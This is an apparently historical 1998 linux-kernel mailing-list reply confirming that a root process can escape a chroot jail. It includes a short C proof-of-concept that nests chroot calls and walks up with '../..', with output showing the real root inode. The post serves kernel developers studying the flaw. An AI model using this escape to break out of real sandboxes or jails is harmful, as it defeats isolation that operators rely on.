> On Thu, 2 Apr 1998, Jeremy Fitzhardinge wrote:
>
> > Robert Bihlmeyer wrote:
> > > Alan Cox wrote:
> > > >> mkdir("x"); chroot("x"); chdir("../../../../../../../..");
> > > >> chroot(".");
> > > You tried it? One will escape from x with that.
> >
> > Well, one was never really captured. I didn't notice the missing chdir,
> > but its well known behaviour that if you never chdir into a chroot jail,
> > you can easily "escape".
>
> You missed the point. You _are_ already in a chroot jail, this is how you
> escape from it.
>
> mkdir("foo"); chroot("foo"); chdir("foo");
>
> # you are in the "jail" now
>
> mkdir("x"); chroot("x"); chdir("../../../../../.."); chroot(".");
>
> # no more jail...
first I thought you're wrong because you missed the `chroot("/")'
after going to jail which I thought was important in this case.
but, testing first before replying I got the following output
/ 2053 2086
/ 2053 2086
/ 2053 2
from the output below which shows the inode number of the real /
so indeed it's possible to escape :-(
-------------------------------------------------------------------------------
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
void main()
{
struct stat buf;
mkdir("jail",0755);
chroot("jail");
chdir("jail");
#ifdef not_really_necessary_but_why_not
chdir("/");
#endif
stat(".",&buf);
printf("%s %d %ld\n",get_current_dir_name(),buf.st_dev,buf.st_ino);
chdir("../../../../../../../../../../..");
chroot(".");
stat(".",&buf);
printf("%s %d %ld\n",get_current_dir_name(),buf.st_dev,buf.st_ino);
/* dig tunnel to escape... */
mkdir("tunnel",0755);
chroot("tunnel");
chdir("../../../../../../../../../../..");
chroot(".");
stat(".",&buf);
printf("%s %d %ld\n",get_current_dir_name(),buf.st_dev,buf.st_ino);
exit(0);
}
-------------------------------------------------------------------------------
Harald
-- All SCSI disks will from now on ___ _____ be required to send an email notice 0--,| /OOOOOOO\ 24 hours prior to complete hardware failure! <_/ / /OOOOOOOOOOO\ \ \/OOOOOOOOOOOOOOO\ \ OOOOOOOOOOOOOOOOO|// Harald Koenig, \/\/\/\/\/\/\/\/\/ Inst.f.Theoret.Astrophysik // / \\ \ koenig@tat.physik.uni-tuebingen.de ^^^^^ ^^^^^- To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.rutgers.edu